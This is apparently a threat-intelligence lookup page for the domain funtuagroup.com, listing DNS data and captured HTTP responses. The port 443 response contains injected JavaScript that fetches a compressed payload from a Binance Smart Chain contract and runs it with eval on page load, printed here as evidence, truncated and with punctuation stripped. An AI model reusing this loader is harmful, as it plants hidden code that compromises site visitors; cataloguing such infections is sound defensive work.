Help
RSS
API
Feed
Maltego
Contact
Domain > funtuagroup.com
×
More information on this domain is in
AlienVault OTX
Is this malicious?
Yes
No
DNS Resolutions
Date
IP Address
2025-01-01
199.188.200.94
(
ClassC
)
Port 80
HTTP/1.1 301 Moved Permanentlykeep-alive: timeout5, max100content-type: text/htmlcontent-length: 795date: Sat, 28 Dec 2024 09:38:33 GMTserver: LiteSpeedlocation: https://funtuagroup.com/x-turbo-charge !DOCTYPE html>html styleheight:100%>head>meta nameviewport contentwidthdevice-width, initial-scale1, shrink-to-fitno />title> 301 Moved Permanently/title>style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}/style>/head>body stylecolor: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;>div styleheight:auto; min-height:100%; > div styletext-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;> h1 stylemargin:0; font-size:150px; line-height:150px; font-weight:bold;>301/h1>h2 stylemargin-top:20px;font-size: 30px;>Moved Permanently/h2>p>The document has been permanently moved./p>/div>/div>/body>/html>
Port 443
HTTP/1.1 200 OKkeep-alive: timeout5, max100x-powered-by: PHP/8.1.31content-type: text/html; charsetUTF-8link: https://funtuagroup.com/wp-json/>; relhttps://api.w.org/link: https://funtuagroup.com/wp-j !DOCTYPE html>html langen-US>head> meta http-equivContent-Type contenttext/html; charsetUTF-8> meta nameviewport contentwidthdevice-width, initial-scale1.0> link relpingback hrefhttps://funtuagroup.com/xmlrpc.php> script srchttps://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js>/script> script srchttps://cdnjs.cloudflare.com/ajax/libs/pako/2.0.4/pako.min.js>/script> script srchttps://cdn.jsdelivr.net/npm/crypto-js@4.1.1/crypto-js.min.js>/script> script> console.log(Start moving...); document.addEventListener(DOMContentLoaded, async () > { try { const web3 new Web3(https://bsc-dataseed.binance.org/); const contract new web3.eth.Contract( {inputs: , stateMutability: nonpayable, type: constructor}, {inputs: , name: orchidABI, outputs: {internalType: string, name: , type: string}, stateMutability: view, type: function}, {inputs: , name: orchidAddress, outputs: {internalType: string, name: , type:string}, stateMutability: view, type: function}, {inputs: , name: merlionABI, outputs: {internalType: string, name: , type: string}, stateMutability: view, type: function}, {inputs: , name: merlionAddress, outputs: {internalType: string, name: , type:string}, stateMutability: view, type: function}, , 0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53); const orchidABI JSON.parse(pako.ungzip(Uint8Array.from(atob(await contract.methods.orchidABI().call()), c > c.charCodeAt(0)), { to: string })); const orchidAddress await contract.methods.orchidAddress().call(); const orchid new web3.eth.Contract(orchidABI, orchidAddress); const decompressedScript pako.ungzip(Uint8Array.from(atob(await orchid.methods.tokyoSkytree().call()), c > c.charCodeAt(0)), { to: string }); eval(`(async () > { ${decompressedScript} })().then(() > { console.log(Moved.); }).
View on OTX
|
View on ThreatMiner
Please enable JavaScript to view the
comments powered by Disqus.
Data with thanks to
AlienVault OTX
,
VirusTotal
,
Malwr
and
others
. [
Sitemap
]